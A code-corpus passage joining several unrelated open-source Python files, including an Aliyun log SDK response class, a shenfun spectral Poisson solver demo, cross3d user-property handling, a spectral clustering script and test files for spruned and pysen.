class CappedDeferTest(basetest.UpvoteTestCase):
def testSuccess(self):
max_size = 6
total_size = 10
expected_results = [True] * max_size + [False] * (total_size - max_size)
actual_results = [
utils.CappedDefer(dir, max_size) for _ in xrange(total_size)
]
self.assertEqual(expected_results, actual_results)
_DEFAULT = constants.TASK_QUEUE.DEFAULT
_METRICS = constants.TASK_QUEUE.METRICS
def _FreeFunction(a=0):
return a + 1
if __name__ == '__main__':
basetest.main()
|
aliyun/log/logresponse.py | topdown618/aliyun-log-python-sdk | 130 | 11086293 | #!/usr/bin/env python
# encoding: utf-8
# Copyright (C) Alibaba Cloud Computing
# All rights reserved.
from .util import Util
class LogResponse(object):
""" The base response class of all log response.
:type headers: dict
:param headers: HTTP response header
"""
def __init__(self, headers, body=''):
self.headers = headers
if body is None:
body = ''
self.body = body
def get_request_id(self):
""" Get the request id of the response. '' will be return if not set.
:return: string, request id
"""
return Util.h_v_td(self.headers, 'x-log-requestid', '')
def get_body(self):
""" Get body
:return: string
"""
return self.body
def get_all_headers(self):
""" Get all http header of the response
:return: dict, response header
"""
return self.headers
def get_header(self, key):
""" Get specified http header of the response, '' will be return if not set.
:type key: string
:param key: the key to get header
:return: string, response header
"""
return self.headers[key] if key in self.headers else ''
def log_print(self):
print('header: ', self.headers)
|
demo/hermite_poisson2D.py | spectralDNS/shenfun | 138 | 11086362 | r"""
Solve Poisson equation in 2D with homogeneous Dirichlet bcs in one direction and
periodic in the other. The domain is (-inf, inf) x [0, 2pi]
.. math::
\nabla^2 u = f,
The equation to solve for a Hermite x Fourier basis is
.. math::
(\nabla u, \nabla v) = -(f, v)
"""
import os
import sys
from sympy import symbols, exp, hermite, cos
import numpy as np
from shenfun import inner, grad, TestFunction, TrialFunction, la, \
Array, Function, FunctionSpace, TensorProductSpace, comm
assert len(sys.argv) == 2, 'Call with one command-line argument'
assert isinstance(int(sys.argv[-1]), int)
# Use sympy to compute a rhs, given an analytical solution
x, y = symbols("x,y", real=True)
#ue = sin(4*x)*exp(-x**2)
ue = cos(4*y)*hermite(4, x)*exp(-x**2/2)
fe = ue.diff(x, 2)+ue.diff(y, 2)
# Size of discretization
N = int(sys.argv[-1])
SD = FunctionSpace(N, 'Hermite')
K0 = FunctionSpace(N, 'Fourier', dtype='d')
T = TensorProductSpace(comm, (SD, K0), axes=(0, 1))
u = TrialFunction(T)
v = TestFunction(T)
# Get f on quad points
fj = Array(T, buffer=fe)
# Compute right hand side of Poisson equation
f_hat = Function(T)
f_hat = inner(v, -fj, output_array=f_hat)
# Get left hand side of Poisson equation
matrices = inner(grad(v), grad(u))
# Solve and transform to real space
u_hat = Function(T) # Solution spectral space
sol = la.SolverGeneric1ND(matrices)
u_hat = sol(f_hat, u_hat)
uq = u_hat.backward()
# Compare with analytical solution
uj = Array(T, buffer=ue)
assert np.allclose(uj, uq, atol=1e-5)
print('Error ', np.linalg.norm(uj-uq))
if 'pytest' not in os.environ:
import matplotlib.pyplot as plt
plt.figure()
X = T.local_mesh(True)
plt.contourf(X[0], X[1], uq)
plt.colorbar()
plt.figure()
plt.contourf(X[0], X[1], uj)
plt.colorbar()
plt.figure()
plt.contourf(X[0], X[1], uq-uj)
plt.colorbar()
plt.title('Error')
plt.figure()
X = T.local_mesh()
for x in np.squeeze(X[0]):
plt.plot((x, x), (np.squeeze(X[1])[0], np.squeeze(X[1])[-1]), 'k')
for y in np.squeeze(X[1]):
plt.plot((np.squeeze(X[0])[0], np.squeeze(X[0])[-1]), (y, y), 'k')
#plt.show()
|
python/akg/ops/math/__init__.py | tianjiashuo/akg | 286 | 11086374 | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""__init__"""
from .abs import Abs
from .abs_sum import AbsSum
from .add import Add
from .addn import Addn
from .assign import Assign
from .cast import Cast
from .divide import Divide
from .equal import Equal
from .exp import Exp
from .expand_dims import ExpandDims
from .greater_equal import GreaterEqual
from .less import Less
from .less_equal import LessEqual
from .log import Log
from .logical_and import LogicalAnd
from .logical_not import LogicalNot
from .logical_or import LogicalOr
from .maximum import Maximum
from .minimum import Minimum
from .mul import Mul
from .neg import Neg
from .notequal import NotEqual
from .pow import Pow
from .reduce_and import ReduceAnd
from .reduce_max import ReduceMax
from .reduce_min import ReduceMin
from .reduce_or import ReduceOr
from .reduce_prod import ReduceProd
from .reduce_sum import ReduceSum
from .reciprocal import Reciprocal
from .round import Round
from .rsqrt import Rsqrt
from .select import Select
from .sqrt import Sqrt
from .sub import Sub
from .sum import Sum |
apps/autotest/run.py | rainydaygit/testtcloudserver | 349 | 11086393 | from apps.autotest.settings import config
from apps.autotest.views.performance import performance
if config.SERVER_ENV != 'dev':
from gevent import monkey
monkey.patch_all()
else:
pass
from apps.autotest.views.datashow import datashow
from apps.autotest.views.monkey import monkey
from library.api.tFlask import tflask
def create_app():
app = tflask(config)
register_blueprints(app)
return app
def register_blueprints(app):
app.register_blueprint(monkey, url_prefix='/v1/monkey')
app.register_blueprint(datashow, url_prefix='/v1/datashow')
app.register_blueprint(performance, url_prefix='/v1/performance')
if __name__ == '__main__':
create_app().run(port=config.PORT)
|
diffy_api/tasks/views.py | TheGableMethod/diffy | 577 | 11086420 | """
.. module: diffy.tasks.views
:platform: Unix
:copyright: (c) 2018 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from flask import Blueprint
from flask_restful import Api, Resource
from diffy_api.extensions import rq
from diffy_api.common.util import validate_schema
from diffy_api.schemas import task_output_schema, task_list_output_schema
mod = Blueprint("tasks", __name__)
api = Api(mod)
class TaskList(Resource):
"""Defines the 'taskss' endpoints"""
def __init__(self):
super(TaskList, self).__init__()
@validate_schema(None, task_list_output_schema)
def get(self):
"""
.. http:get:: /tasks
The current list of tasks
**Example request**:
.. sourcecode:: http
GET /tasks HTTP/1.1
Host: example.com
Accept: application/json, text/javascript
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: text/javascript
# TODO
:statuscode 200: no error
:statuscode 403: unauthenticated
"""
queue = rq.get_queue()
data = queue.get_jobs()
return data, 200
class Task(Resource):
"""Defines the 'taskss' endpoints"""
def __init__(self):
super(Task, self).__init__()
@validate_schema(None, task_output_schema)
def get(self, task_id):
"""
.. http:get:: /tasks
The current list of tasks
**Example request**:
.. sourcecode:: http
GET /tasks HTTP/1.1
Host: example.com
Accept: application/json, text/javascript
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: text/javascript
# TODO
:statuscode 200: no error
:statuscode 403: unauthenticated
"""
queue = rq.get_queue()
return queue.fetch_job(task_id)
api.add_resource(Task, "/tasks/<task_id>")
api.add_resource(TaskList, "/tasks", endpoint="tasks")
|
cross3d/abstract/abstractuserprops.py | vedantirb/cross3d | 129 | 11086434 | # #
# \namespace cross3d.UserProps
#
# \remarks The cross3d.UserProps package creates an abstract wrapper from a 3d system
# to use storing and retreiving custom user props
#
# \author mike
# \author Blur Studio
# \date 05/26/11
#
import re
import json
import cross3d
from collections import OrderedDict
from PyQt4.QtCore import QTimer as _QTimer
dispatchObject = cross3d.dispatch.dispatchObject
class AbstractUserProps(dict):
"""
The cross3d.UserProps package creates an abstract wrapper from a
3d system to use storing and retreiving custom user props
"""
def __init__(self, nativePointer):
dict.__init__(self)
self._nativePointer = nativePointer
# Handling and cleaning legacy tags. This is going away soon.
# Pulls values from Tags and BlurTags the first time they are encountered
# and then immediately deletes them so that they don't continue to overwrite
# any values that are set on UserProps.
# if 'BlurTags' in self.keys() and self['BlurTags']:
# for key in self['BlurTags']:
# self[key] = self['BlurTags'][key]
# scene = cross3d.Scene()
# obj = cross3d.SceneObject(scene, nativePointer)
# self['BlurTags'] = {}
# if not obj.model().isReferenced():
# del self['BlurTags']
# if 'Tags' in self.keys() and self['Tags']:
# for key in self['Tags']:
# self[key] = self['Tags'][key]
# scene = cross3d.Scene()
# obj = cross3d.SceneObject(scene, nativePointer)
# self['Tags'] = {}
# if not obj.model().isReferenced():
# del self['Tags']
def __contains__(self, key):
return key in self.lookupProps()
def __getitem__(self, key):
return dict.__getitem__(self, key)
def __iter__(self):
return iter(self.keys())
def __setitem__(self, key, value):
dict.__setitem__(self, key, value)
self.emitChange()
def __str__(self):
return '<{cls} {props}>'.format(cls=self.__class__.__name__, props=unicode(self.lookupProps()))
def clear(self):
self.lookupProps().clear()
def copy(self):
return self.lookupProps().copy()
def emitChange(self, key=None):
if key == 'Tags':
dispatchObject('TagChanged', self._nativePointer)
else:
dispatchObject('customPropChanged', self._nativePointer)
def keys(self):
return self.lookupProps().keys()
def items(self):
return self.lookupProps().items()
def iteritems(self):
return self.lookupProps().iteritems()
def iterkeys(self):
return self.lookupProps().iterkeys()
def itervalues(self):
return self.lookupProps().itervalues()
def has_key(self, key):
return self.lookupProps().has_key(key)
def get(self, key, default=None):
return self.lookupProps().get(key, default)
def lookupProps(self):
"""
This is the workhorse method for the class, it is responsible for
providing the dictionary of key value pares used for most of the
class. If it is unabstracted it will return a empty dictionary
:return: dict
"""
return {}
def toString(self, prefix='', seperator=':', postfix=' '):
out = ''
for key in self.keys():
value = self[key]
line = prefix + key + seperator + unicode(value) + postfix
out += line
return out
def updateFromName(self, format=None):
# TODO: REMOVE the dependency of this module
from blur3d.naming import Name
name = Name(self._nativePointer.name, format)
for element in name.elements():
key = element.objectName()
text = element.text()
if text == 'x':
if key in self:
del self[key]
else:
self[key] = text
def pop(self, key, default=None):
return self.lookupProps().pop(key, default)
def popitem(self):
return self.lookupProps().popitem()
def setAllHidden(self, state):
"""
Make all user props visible or hidden if the software supports it.
:param state: Should the propery be shown or hidden
"""
for key in self.keys():
self.setHidden(key, state)
def setdefault(self, key, default=None):
props = self.lookupProps()
if not key in props:
self[key] = default
return self[key]
def setHidden(self, key, state):
"""
Hide the mecinism that stores user props in software that supports it.
:param key: The key used to access the user prop
:param state: If the item is hidden or shown
"""
return False
def update(self, *args, **kwargs):
for k, v in dict(*args, **kwargs).iteritems():
self[k] = v
def values(self):
return self.lookupProps().values()
@staticmethod
def escapeKey(string):
"""
Replaces any unstorable characters in key with their html codes
"""
if not isinstance(string, (str, unicode)):
string = unicode(string)
return string.replace(' ', ' ').replace('\n', ' ').replace('\r', ' ')
@staticmethod
def escapeValue(string):
"""
Replaces any unstorable characters in value with their html codes
"""
if not isinstance(string, (str, unicode)):
string = unicode(string)
return string.replace('\r\n', ' ').replace('\n', ' ').replace('\r', ' ')
@staticmethod
def unescapeKey(string):
"""
Replaces any html codes with their associated unstorable characters
"""
if not isinstance(string, (str, unicode)):
string = unicode(string)
return string.replace(' ', ' ').replace(' ', '\n').replace(' ', '\r')
@staticmethod
def unescapeValue(string):
"""
Replaces any html codes with their associated unstorable characters
"""
string = unicode(string)
try:
return json.loads( string )
except ValueError:
pass
string, typ = AbstractUserProps._decodeString(string)
if typ == float:
return float(string)
elif typ == int:
return int(string)
elif typ in (list, dict, tuple, bool, OrderedDict):
return eval(string)
return string
@staticmethod
def _decodeString(string):
try:
int(string)
return string, int
except:
pass
if string.find('.') != -1:
try:
float(string)
return string, float
except:
pass
if string in ('True', 'False'):
return string, bool
if re.match('{.*}', string):
return string, dict
if re.match('\[.*\]', string):
return string, list
if re.match('#\(.*\)', string):
data = []
s = string
sOpen, close = AbstractUserProps._posCounter(s)
while (sOpen != -1 or close != -1):
s = s[:sOpen-2]+'['+s[sOpen:close]+']'+s[close+1:]
sOpen, close = AbstractUserProps._posCounter(s)
return s, list
if re.match('\(.*\)', string):
return string, tuple
if re.match('OrderedDict\(.*\)', string):
return string, OrderedDict
return string, None
@staticmethod
def _posCounter(string, opening = '#(', closing = ')'):
openBr = 0
openPos = 0
found = False
for pos in range(0, len(string)):
if string[pos-2:pos] == opening:
openBr += 1
if not found:
openPos = pos
found = True
elif string[pos] == closing:
openBr -= 1
if found and not openBr:
break
else:
return -1,-1
return openPos, pos
class AbstractFileProps(AbstractUserProps):
def __init__(self, fileName=''):
self._dso = None
self.fileName = fileName
self._closeScheduled = False
self._saveScheduled = False
super(AbstractFileProps, self).__init__(None)
def __delitem__(self, key):
if self.dso().open(self.fileName):
self._saveScheduled = True
if self.dso().removeCustomProperty(key):
self._close()
return True
raise KeyError('FileProps does not contain key: %s' % key)
else:
raise cross3d.Exceptions.FileNotDSO
def __getitem__(self, key):
if self.dso().open(self.fileName):
self._scheduleClose()
out = self.dso().customProperty(key)
if out:
return self.unescapeValue(out.value())
raise KeyError('FileProps does not contain key: %s' % key)
else:
raise cross3d.Exceptions.FileNotDSO
def __setitem__(self, key, value):
if self.dso().open(self.fileName):
self._saveScheduled = True
prop = self.dso().customProperty(key)
if prop:
prop.setValue(value)
else:
self.dso().addCustomProperty(key, value)
self._close()
self.emitChange()
else:
raise cross3d.Exceptions.FileNotDSO
def __repr__(self):
return self.__str__()
def _close(self):
if self._saveScheduled:
self._saveScheduled = False
self.dso().save()
self.dso().close()
self._closeScheduled = False
def _scheduleClose(self, save=False):
if save:
self._saveScheduled = save
if not self._closeScheduled:
_QTimer.singleShot(0, self._close)
self._closeScheduled = True
def clear(self):
"""
Removes all attributes and immediately saves the changes. There is no QTimer delay.
"""
if self.dso().open(self.fileName):
self.dso().clear()
self._saveScheduled = True
self._close()
self.emitChange()
else:
raise cross3d.Exceptions.FileNotDSO
def close(self):
"""
Immediately closes the connection to the file.
"""
if self.dso().open(self.fileName):
self._close()
else:
raise cross3d.Exceptions.FileNotDSO
def dso(self):
if not self._dso:
from cross3d.migrate import dsofile
self._dso = dsofile.DSOFile()
return self._dso
def lookupProps(self):
dso = self.dso()
if self.dso().open(self.fileName):
self._scheduleClose()
ret = {}
[ret.update({prop.name(): self.unescapeValue(prop.value())}) for prop in self.dso().customProperties()]
return ret
else:
raise cross3d.Exceptions.FileNotDSO
def update(self, *args, **kwargs):
"""
Adds all provided items and imedeately saves the changes. There is no QTimer delay.
"""
if self.dso().open(self.fileName):
for k, v in dict(*args, **kwargs).iteritems():
self[k] = v
self._saveScheduled = True
self._close()
else:
raise cross3d.Exceptions.FileNotDSO
# register the symbol
cross3d.registerSymbol('UserProps', AbstractUserProps, ifNotFound=True)
cross3d.registerSymbol('FileProps', AbstractFileProps, ifNotFound=True)
|
Chapter09/mandelbrot/mandelbrot/simple/__init__.py | yoyboy/Software-Architecture-with-Python | 103 | 11086444 | <gh_stars>100-1000
from . import mandelbrot
|
test/test_application/test_jsonrpc/test_getblock.py | darosior/spruned | 152 | 11086467 | <reponame>darosior/spruned
import asyncio
import random
from unittest import TestCase
from unittest.mock import Mock, call
from spruned.application.jsonrpc_server import JSONRPCServer
from spruned.application.utils.jsonrpc_client import JSONClient
from test.utils import async_coro
class TestJSONRPCServerGetblock(TestCase):
def setUp(self):
bindport = random.randint(31337, 41337)
self.sut = JSONRPCServer('127.0.0.1', bindport, 'testuser', 'testpassword')
self.vo_service = Mock()
self.sut.set_vo_service(self.vo_service)
self.client = JSONClient(b'testuser', b'testpassword', '127.0.0.1', bindport)
self.loop = asyncio.get_event_loop()
def test_getblock_success(self):
self.vo_service.getblock.side_effect = [async_coro({'block': 'header'}),
async_coro('cafebabe')]
async def test():
await self.sut.start()
response = await self.client.call('getblock', params=['00' * 32])
response2 = await self.client.call('getblock', params=['00' * 32, False])
return response, response2
res, res2 = self.loop.run_until_complete(test())
self.assertEqual(
res,
{'error': None, 'id': 1, 'jsonrpc': '2.0', 'result': {'block': 'header'}}
)
self.assertEqual(
res2,
{'error': None, 'id': 1, 'jsonrpc': '2.0', 'result': 'cafebabe'}
)
Mock.assert_has_calls(
self.vo_service.getblock,
calls=[
call('00' * 32, 1),
call('00' * 32, False)
]
)
def test_getblock_error_missing(self):
response = None
self.vo_service.getblock.return_value = async_coro(response)
async def test():
await self.sut.start()
response = await self.client.call('getblock', params=['00'*32])
return response
res = self.loop.run_until_complete(test())
self.assertEqual(
res,
{'error': {'code': -5, 'message': 'Block not found'}, 'id': 1, 'jsonrpc': '2.0', 'result': None}
)
Mock.assert_called_with(self.vo_service.getblock, '00' * 32, 1)
def test_getblock_error_error_params(self):
response = None
self.vo_service.getblock.return_value = async_coro(response)
async def test():
await self.sut.start()
response1 = await self.client.call('getblock', params=['wrong_blockhash'])
response2 = await self.client.call('getblock')
return response1, response2
res, res2 = self.loop.run_until_complete(test())
self.assertEqual(
res,
{
'jsonrpc': '2.0',
'error': {
'code': -5, 'message': 'Error parsing JSON:wrong_blockhash'
},
'id': 1,
'result': None
}
)
# Really should be code: -32602, but that'll cause bitcoin-cli not to
# error out correctly, so we use -1 instead
self.assertEqual(
res2,
{'jsonrpc': '2.0', 'error': {'code': -1, 'message': 'Invalid params'}, 'id': 1, 'result': None}
)
Mock.assert_not_called(self.vo_service.getblock)
|
tests/config/__init__.py | dadaloop82/viseron | 399 | 11086485 | <filename>tests/config/__init__.py
"""Tests for config module."""
|
tests/test_init.py | linshoK/pysen | 423 | 11086494 | <reponame>linshoK/pysen
import argparse
import pathlib
import tempfile
import unittest.mock
from typing import Optional, Sequence
import pytest
import pysen
from pysen import ConfigureLintOptions, configure_lint
from pysen.exceptions import CommandNotFoundError
from pysen.manifest import Manifest, TargetType
from pysen.reporter import ReporterFactory
from pysen.runner_options import RunOptions
BASE_DIR = pathlib.Path(__file__).resolve().parent
def test_load_manifest() -> None:
manifest = pysen.load_manifest(BASE_DIR / "fakes/configs/example.toml")
assert manifest is not None
with pytest.raises(FileNotFoundError):
pysen.load_manifest(BASE_DIR / "no_such_file.toml")
def test_build_manifest() -> None:
# NOTE(igarashi): since build_manifest is just a reference for pysen.build_manifest.build,
# we just check if the function does not raise an error in this test.
manifest = pysen.build_manifest(
[], external_builder=BASE_DIR / "fakes/configs/good_builder.py"
)
assert manifest is not None
def test_run() -> None:
with unittest.mock.patch(
"pysen.runner.Runner.export_settings"
) as mock_export, unittest.mock.patch("pysen.runner.run_target") as mock_run:
assert pysen.run(
BASE_DIR, "lint", pyproject=BASE_DIR / "fakes/configs/example.toml"
)
mock_export.assert_called()
# check if settings_dir is correctly handled
mock_export.reset_mock()
with tempfile.TemporaryDirectory() as d:
td = pathlib.Path(d)
assert pysen.run(
BASE_DIR,
"lint",
pyproject=BASE_DIR / "fakes/configs/example.toml",
settings_dir=td,
)
mock_export.assert_called_once_with(
BASE_DIR, td, argparse.Namespace(disable=None, enable=None)
)
with pytest.raises(CommandNotFoundError):
assert pysen.run(
BASE_DIR, "lint2", pyproject=BASE_DIR / "fakes/configs/example.toml"
)
components = configure_lint(ConfigureLintOptions(enable_black=True))
assert pysen.run(BASE_DIR, "lint", components=components)
with pytest.raises(CommandNotFoundError):
assert pysen.run(BASE_DIR, "lint2", components=components)
manifest = Manifest(components)
assert pysen.run(BASE_DIR, "lint", manifest=manifest)
with pytest.raises(CommandNotFoundError):
assert pysen.run(BASE_DIR, "lint2", manifest=manifest)
# TODO(igarashi): Add test to check run() handles both args and manifest_args
with pytest.raises(FileNotFoundError):
pysen.run(BASE_DIR, "lint", pyproject=BASE_DIR / "no_such_file.toml")
with pytest.raises(ValueError):
pysen.run(BASE_DIR, "lint")
with pytest.raises(ValueError):
pysen.run(
BASE_DIR,
"lint",
pyproject=BASE_DIR / "fakes/configs/example.toml",
manifest=manifest,
)
# NOTE(igarashi): Check that run() returns False when the command reports an error
def side_effect(
target: TargetType,
reporters: ReporterFactory,
options: RunOptions,
files: Optional[Sequence[pathlib.Path]],
) -> None:
with reporters.create("hoge") as r:
r.set_result(False, 128)
mock_run.side_effect = side_effect
assert not pysen.run(
BASE_DIR, "lint", pyproject=BASE_DIR / "fakes/configs/example.toml"
)
assert not pysen.run(BASE_DIR, "lint", components=components)
assert not pysen.run(BASE_DIR, "lint", manifest=manifest)
|
classifiers/dimensionality_reduction/graph_spectral_analysis&spectral_clustering_default.py | gionanide/Speech-Signal-Processing-and-Classification | 203 | 11086496 | <filename>classifiers/dimensionality_reduction/graph_spectral_analysis&spectral_clustering_default.py
#!usr/bin/python
from __future__ import division
import pandas as pd
from sklearn import model_selection
from sklearn.svm import SVC # supportctors for classification
from sklearn.metrics import accuracy_score, confusion_matrix, classification_report
from sklearn.model_selection import cross_val_score, GridSearchCV
import timeit
from sklearn.preprocessing import MinMaxScaler
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
import numpy as np
from sklearn.neighbors import KNeighborsClassifier, NearestNeighbors
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
import seaborn as sns
from sklearn.manifold import LocallyLinearEmbedding, SpectralEmbedding, Isomap
from sklearn.cluster import SpectralClustering
from sklearn.metrics.cluster import homogeneity_score
'''this function takes as an input the path of a file with features and labels and returns the content of this file as a csv format in
the form feature1.........feature13,Label'''
def readFile():
#make the format of the csv file. Our format is a vector with 13 features and a label which show the condition of the
#sample hc/pc : helathy case, parkinson case
names = ['Feature1', 'Feature2', 'Feature3', 'Feature4','Feature5','Feature6','Feature7','Feature8','Feature9',
'Feature10','Feature11','Feature12','Feature13','Label']
#path to read the samples, samples consist from healthy subjects and subject suffering from Parkinson's desease.
#path = 'mfcc_man_woman.txt'
path = 'PATH_TO_SAMPLES.txt'
#path = '/home/gionanide/Theses_2017-2018_2519/features/parkinson_healthy/mfcc_parkinson_healthy.txt'
#read file in csv format
data = pd.read_csv(path,names=names )
#return an array of the shape (2103, 14), lines are the samples and columns are the features as we mentioned before
return data
'takes the csv file and split the label from the features'
def splitData(data):
# Split-out the set in two different arrayste
array = data.values
#features array contains only the features of the samples
features = array[:,0:13]
#labels array contains only the lables of the samples
labels = array[:,13]
return features,labels
'''
make this class in order to train the model with the same amount of samples of each class, because we have bigger support from class 0
than class1, particularly it is 9 to 1.'''
def equalizeClasses(data):
#take all the samples from the data frame that they have Label value equal to 0 and in the next line equal to 1
class0 = data.loc[data['Label'] == 0]#class0 and class1 are dataFrames
class1 = data.loc[data['Label'] == 1]
#check which class has more samples, by divide them and check if the number is bigger or smaller than 1
weight = len(class0) // len(class1) #take the results as an integer in order to split the class, using prior knowledge that
#class0 has more samples, if it is bigger class0 has more samples and to be exact weight to 1
balance = (len(class0) // weight) #this is the number of samples in order to balance our classes
#the keyword argument frac specifies the fraction of rows to return in the random sample, so fra=1 means, return random all rows
#we kind of a way shuffle our data in order not to take the same samples in every iteration
#class0 = class0.sample(frac=1)
#samples array for training taking the balance number of samples for the shuffled dataFrame
newClass0 = class0.sample(n=balance)
#and now combine the new dataFrame from class0 with the class1 to return the balanced dataFrame
newData = pd.concat([newClass0, class1])
#return the new balanced(number of samples from each class) dataFrame
return newData
'''we made this function in order to make a loop, the equalized data take only a small piece of the existing data, so with this
loop we are going to take iteratably all the data, but from every iteration we are keeping only the samples who were support
vectors, the samples only the class which we are taking a piece of it's samples'''
def keepSV():
print 'yolo'
'''we use this function in order to apply greedy search for finding the parameters that best fit our model. We have to mention
that we start this procedure from a very large field and then we tried to focues to the direction where the results
appear better. For example for the C parameter, the first range was [0.0001, 0.001, 0.01, 0.1, 1, 10 ,100 ,1000], the result was that
the best value was 1000 so then we tried [100, 1000, 10000, 100000] and so on in order to focues to the area which give us
the best results. This function is in comments because we found the best parameters and we dont need to run it in every trial.'''
def paramTuning(features_train, labels_train, nfolds):
#using the training data and define the number of folds
#determine the range of the Cs range you want to search
Cs = [0.001, 0.01, 0.1 ,1, 10, 100, 1000, 10000]
#determine the range of the gammas range you want to search
gammas = [0.00000001 ,0.00000001 ,0.0000001, 0.000001, 0.00001, 0.0001, 0.001, 0.01, 0.1 , 1, 10, 100, 1000]
#make the dictioanry
param_grid = {'C': Cs, 'gamma': gammas}
#start the greedy search using all the matching sets from above
grid_search = GridSearchCV(SVC(kernel='poly'),param_grid,cv=nfolds)
#fit your training data
grid_search.fit(features_train, labels_train)
#visualize the best couple of parameters
print grid_search.best_params_
'''Classify Parkinson and Helathy. Building a model which is going to be trained with of given cases and test according to new ones'''
def classifyPHC():
data = readFile()
#data = equalizeClasses(data)
features,labels = splitData(data)
#determine the training and testing size in the range of 1, 1 = 100%
validation_size = 0.2
#here we are splitting our data based on the validation_size into training and testing data
#features_train, features_validation, labels_train, labels_validation = model_selection.train_test_split(features, labels,
#test_size=validation_size)
#we are using all the features because it is clustering so we do not want to split to testing and training
#bacause we apply unsupervised techniques
#normalize data in the range [-1,1]
scaler = MinMaxScaler(feature_range=(-1, 1))
#fit only th training data in order to find the margin and then test to data without normalize them
scaler.fit(features)
features_scalar = scaler.transform(features)
#trnasform the validation features without fitting them
#features_validation_scalar = scaler.transform(features_validation)
#apply the dimensionality reduction using graph spectral analysis
'''#LocallyLinearEmbedding
lle = LocallyLinearEmbedding(n_components=2)
#transform data
features_embedded = lle.fit_transform(features_scalar)'''
'''#Isometric Mapping
isomap = Isomap(n_components=2)
#transform data
features_embedded = isomap.fit_transform(features_scalar)'''
#Graph embedding
spectralEmbedding = SpectralEmbedding(n_components=2)
#transform training and validation data
features_embedded = spectralEmbedding.fit_transform(features_scalar)
#we can see the shapes of the array just to check
print 'feature training array: ',features_embedded.shape #,'and label training array: ',labels_train.shape
#print 'feature testing array: ',features_validation_embedded.shape,'and label testing array: ',labels_validation.shape,'\n'
#take the best couple of parameters from the procedure of greedy search
#paramTuning(features_train, labels_train, 5)
#we initialize our model
#svm = SVC(kernel='poly',C=0.001,gamma=10,degree=3,decision_function_shape='ovr')
#svm = KNeighborsClassifier(n_neighbors=3)
#Apply spectral clustering
spectralClustering = SpectralClustering(n_clusters=2)
#train our model with the data that we previously precessed
#spectralClustering.fit(features_embedded )
#now test our model with the test data
spectralClustering.fit(features_embedded)
predicted_labels = spectralClustering.labels_
#first implementation of score computing
#accuracy = accuracy_score(labels, predicted_labels)
#More accurate implementation, considering opposite labels
accuracy = homogeneity_score(labels, predicted_labels)
print 'Clustering accuracy: ',accuracy*100,'\n'
#confusion matrix to illustrate the faulty classification of each class
conf_matrix = confusion_matrix(labels, predicted_labels)
print 'Confusion matrix: \n',conf_matrix,'\n'
print 'Support class 0 class 1:'
#calculate the support of each class
print ' ',conf_matrix[0][0]+conf_matrix[0][1],' ',conf_matrix[1][0]+conf_matrix[1][1],'\n'
#calculate the accuracy of each class
hC = (conf_matrix[0][0]/(conf_matrix[0][0]+conf_matrix[0][1]))*100
pC = (conf_matrix[1][1]/(conf_matrix[1][0]+conf_matrix[1][1]))*100
#see the inside details of the classification
print 'For class 0 man cases:',conf_matrix[0][0],'classified correctly and',conf_matrix[0][1],'missclassified,',hC,'accuracy \n'
print 'For class 1 woman cases:',conf_matrix[1][1],'classified correctly and',conf_matrix[1][0],'missclassified,',pC,'accuracy\n'
#plot the training features after the kpca and the lda procedure
embedded_labels = pd.DataFrame({'Feature1': features_embedded[: ,0], 'Feature2': features_embedded[: ,1],'Label': labels})
sns.pairplot(embedded_labels, hue='Label')
#plt.savefig('kpca_trainset_parkinson_healthy.png')
#plt.show()
#plot the training features after the kpca and the lda procedure
embedded_predicted_labels = pd.DataFrame({'Feature1': features_embedded[: ,0], 'Feature2': features_embedded[: ,1],'Label': predicted_labels})
sns.pairplot(embedded_predicted_labels, hue='Label')
#plt.savefig('kpca_trainset_parkinson_healthy.png')
plt.show()
def main():
#calculate the time
import time
start_time = time.time()
#we are making an array in order to keep the support vectors and feed the function with them for the next iteration
#support_vectors =
classifyPHC()
time = time.time()-start_time
print 'time: ',time
main()
|
fairseq/models/wav2vec.py | theorm/fairseq | 239 | 11086497 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import sys
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from . import (
BaseFairseqModel, register_model, register_model_architecture
)
@register_model('wav2vec')
class Wav2VecModel(BaseFairseqModel):
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
parser.add_argument('--prediction-steps', type=int, metavar='N', help='number of steps ahead to predict')
parser.add_argument('--sample-distance', type=int, metavar='N',
help='sample distance from target. does not work properly with cross-sampling')
parser.add_argument('--cross-sample-negatives', action='store_true',
help='whether to sample negatives across examples in the same batch')
parser.add_argument('--num-negatives', type=int, metavar='N', help='number of negative examples')
parser.add_argument('--conv-feature-layers', type=str, metavar='EXPR',
help='convolutional feature extraction layers [(dim, kernel_size, stride), ...]')
parser.add_argument('--conv-aggregator-layers', type=str, metavar='EXPR',
help='convolutional feature extraction layers [(dim, kernel_size, stride), ...]')
parser.add_argument('--dropout', type=float, metavar='D', help='dropout to apply within the model')
parser.add_argument('--dropout-features', type=float, metavar='D', help='dropout to apply to the features')
parser.add_argument('--dropout-agg', type=float, metavar='D', help='dropout to apply after aggregation step')
parser.add_argument('--encoder', type=str, choices=['cnn'], help='type of encoder to use')
parser.add_argument('--aggregator', type=str, choices=['cnn', 'gru'],
help='type of aggregator to use')
parser.add_argument('--gru-dim', type=int, metavar='N', help='GRU dimensionality')
parser.add_argument('--no-conv-bias', action='store_true',
help='if set, does not learn bias for conv layers')
parser.add_argument('--agg-zero-pad', action='store_true',
help='if set, zero pads in aggregator instead of repl pad')
parser.add_argument('--skip-connections-feat', action='store_true',
help='if set, adds skip connections to the feature extractor')
parser.add_argument('--skip-connections-agg', action='store_true',
help='if set, adds skip connections to the aggregator')
parser.add_argument('--residual-scale', type=float, metavar='D',
help='scales residual by sqrt(value)')
parser.add_argument('--log-compression', action='store_true',
help='if set, adds a log compression to feature extractor')
